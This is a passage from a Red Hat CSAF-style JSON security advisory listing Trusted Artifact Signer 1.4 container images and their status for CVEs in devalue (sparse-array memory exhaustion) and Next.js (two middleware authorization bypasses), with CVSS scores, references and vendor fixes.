"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2487050"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in devalue, a JavaScript library used for serializing values. Due to quirks in some JavaScript engines, the `devalue.parse` function could be exploited by a remote attacker when deserializing specially crafted sparse arrays. This could lead to excessive memory consumption, resulting in a Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "devalue: devalue: Excessive memory consumption via deserialization of sparse arrays",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42570"
},
{
"category": "external",
"summary": "RHBZ#2487050",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487050"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42570",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42570"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42570",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42570"
},
{
"category": "external",
"summary": "https://github.com/sveltejs/devalue/commit/206ca6712fbc380a4571c59de9ab04b91110792d",
"url": "https://github.com/sveltejs/devalue/commit/206ca6712fbc380a4571c59de9ab04b91110792d"
},
{
"category": "external",
"summary": "https://github.com/sveltejs/devalue/releases/tag/v5.8.1",
"url": "https://github.com/sveltejs/devalue/releases/tag/v5.8.1"
},
{
"category": "external",
"summary": "https://github.com/sveltejs/devalue/security/advisories/GHSA-77vg-94rm-hx3p",
"url": "https://github.com/sveltejs/devalue/security/advisories/GHSA-77vg-94rm-hx3p"
}
],
"release_date": "2026-06-09T16:12:26.377000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "devalue: devalue: Excessive memory consumption via deserialization of sparse arrays"
},
{
"cve": "CVE-2026-44573",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-05-13T18:01:50.343509+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477199"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. Applications utilizing the Pages Router with internationalization (i18n) configured and middleware or proxy-based authorization are susceptible to unauthorized access. A remote attacker can exploit this by making locale-less /_next/data/\u003cbuildId\u003e/\u003cpage\u003e.json requests, which bypass the intended authorization checks. This allows the attacker to retrieve sensitive server-side rendered (SSR) JSON data from protected pages, leading to information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "next.js: Next.js: Information disclosure due to middleware bypass in Pages Router with i18n",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: A flaw in Next.js applications allows unauthorized access to sensitive server-side rendered (SSR) JSON data by bypassing middleware authorization checks. This occurs when applications use the Pages Router with internationalization (i18n) and middleware or proxy-based authorization, enabling remote attackers to retrieve protected page data through locale-less requests.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44573"
},
{
"category": "external",
"summary": "RHBZ#2477199",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477199"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44573",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44573"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44573",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44573"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5"
}
],
"release_date": "2026-05-13T16:48:16.218000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "next.js: Next.js: Information disclosure due to middleware bypass in Pages Router with i18n"
},
{
"cve": "CVE-2026-44574",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-05-13T18:02:21.088167+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477207"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. This vulnerability allows an attacker to bypass security checks in web applications that use Next.js middleware to protect specific web pages. By sending specially crafted web addresses, an attacker can access protected content without proper authorization. This could lead to unauthorized viewing of sensitive information or access to restricted features.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Next.js: Next.js: Authorization bypass via crafted query parameters",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important authorization bypass flaw in Next.js applications, which are utilized in Red Hat AMQ, Red Hat Trusted Artifact Signer, and Red Hat Enterprise Linux AI. The vulnerability arises when applications use Next.js middleware to protect dynamic routes, allowing attackers to access restricted content by manipulating query parameters. This bypass occurs because specially crafted parameters can alter the route value seen by the page while the visible path remains unchanged, circumventing intended security controls.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44574"
},
{
"category": "external",
"summary": "RHBZ#2477207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477207"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44574",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44574"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44574",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44574"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv"
}
],
"release_date": "2026-05-13T16:56:06.008000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
